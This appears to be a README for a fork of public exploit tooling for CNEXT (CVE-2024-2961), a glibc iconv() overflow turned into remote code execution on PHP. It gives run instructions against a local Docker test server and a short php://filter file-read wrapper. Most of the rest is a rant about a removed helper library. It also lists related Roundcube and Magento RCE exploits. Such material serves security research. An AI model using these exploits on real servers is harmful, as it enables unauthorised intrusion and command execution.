Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv(), by @cfreal_

• support nixos
• add test environment
• remove the disgusting ten python dependency

1. Enter nix develop and open a php environment in the test_env using docker run --name php --net host -v $(pwd):/var/www/html php:7.4-apache (pr replace php:7.4-apache with 20a3732f422b)
2. run python cnext-exploit.py 'http://127.0.0.1:80' 'ls /' and you will see the result.

like this:

from cnext_exploit import Exploit

def test_get_path(url, path: str) -> bytes | None:
    print(f"Get path: {path}")
    path = f"php://filter/convert.base64-encode/resource={path}"
    response = requests.post(url, data={"file": path})
    result = re.search("File contents: (.*)", response.text, flags=re.S)
    if not result:
        return None
    data = result.group(1)
    return base64.b64decode(data)

def entry(url: str, command: str, sleep: int = 1, heap: str | None = None):

    exploit = Exploit(
        get_path=lambda path: test_get_path(url, path),
        command=command,
        sleep=sleep,
        heap=heap,
    )
    exploit.run()

It's a useless thin wrapper of things that already exists.

• msg_* are just fancier print
  • but msg_status is different
• failure simply raises an exception
• inform is a decorator that does nothing but print texts, why do we need these many ways to PRINT something?
• @entry: another fire, but use dataclasses
  • spoiler: then you need to write everything in a f*cking dataclass
• tf.random.string just join random characters from random.choices(string.ascii_letters + string.digits, k = length)
• table.split(maps, strip=True) is just maps.split('\n') and ignore empty strings.
• Path.write: just pathlib.Path.write_bytes (maybe combined with pathlib.Path.write_text?), what about just use the default one? you know what you want write right?
• logger: renaming logging.getLogger, WHY? logging.getLogger already exists for YEARS! WHY DO YOU WANT TO RENAME IT JUST FOR MAKING IT LOOKS FANCY???
• base64.decode: just builtin base64.b64decode, YET ANOTHER RENAMING???
• base64.encode: just builtin base64.b64encode with other steps, it CHECKS PADDING AND RETURN STRING
  • when you want to check padding, you JUST USE endswith!!!!!
  • and this base64 package has the same name as the builtin one in python
• and finally the response.re.search is just re.search(..., response.text), why don't you guys want to be normal?

I remove this disgusting thin wrapper in my life, and choose solid things like builtin library and great libraries like fire. It makes my life much easier.

PS: it use from ten import * to import itself just like pwntools, which is definitely disgusting too. The pwntools is for interactive python shell and you guys are using it for writing scripts. I really feel sick about it.

The vulnerability and exploits are described in the following blogposts:

• Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 1): PHP filters
• Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 2): direct iconv() calls, Roundcube
• To be continued...

Exploits will become available as blogposts come out.

• CNEXT: file read to RCE exploit
• Roundcube: authenticated RCE exploit
• CosmicSting + CNEXT: RCE on Magento <= 2.4.7
• To be continued...